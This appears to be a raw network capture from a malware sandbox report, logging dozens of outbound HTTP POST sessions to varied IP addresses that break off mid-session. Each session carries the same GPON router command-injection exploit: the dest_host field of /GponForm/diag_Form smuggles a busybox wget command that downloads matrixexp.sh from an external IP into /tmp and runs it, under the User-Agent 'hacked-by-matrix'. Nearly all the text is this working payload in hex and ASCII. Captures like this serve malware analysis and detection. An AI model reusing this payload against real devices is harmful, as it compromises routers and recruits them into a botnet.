                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        91192.168.2.13519625.193.128.254443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433721066 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        92192.168.2.1340440212.77.162.153443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433749914 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        93192.168.2.1353110109.131.163.120443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433757067 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        94192.168.2.1343094212.123.102.233443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433790922 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        95192.168.2.1343664118.72.212.129443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433824062 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        96192.168.2.1359142118.68.159.7443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433851004 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        97192.168.2.135720842.84.41.139443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433865070 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        98192.168.2.1346604118.239.231.218443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433887959 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        99192.168.2.1340906109.6.70.150443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433942080 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        100192.168.2.13457805.76.56.56443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433974028 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        101192.168.2.133726842.31.7.80443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433995008 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        102192.168.2.1332902109.216.46.115443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434012890 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        103192.168.2.1339246109.53.231.135443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434029102 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        104192.168.2.1347630212.102.150.89443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434087038 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        105192.168.2.1348668109.31.7.171443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434108973 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        106192.168.2.1337792109.78.105.7443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434129000 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        107192.168.2.1339564109.189.6.73443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434169054 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        108192.168.2.1354412212.68.170.78443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434222937 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        109192.168.2.134113842.134.106.119443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434250116 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        110192.168.2.1334250212.167.104.149443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434297085 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        111192.168.2.1333620212.158.199.17443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434320927 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        112192.168.2.1358728212.43.162.139443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434330940 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        113192.168.2.133627842.35.54.240443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434348106 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
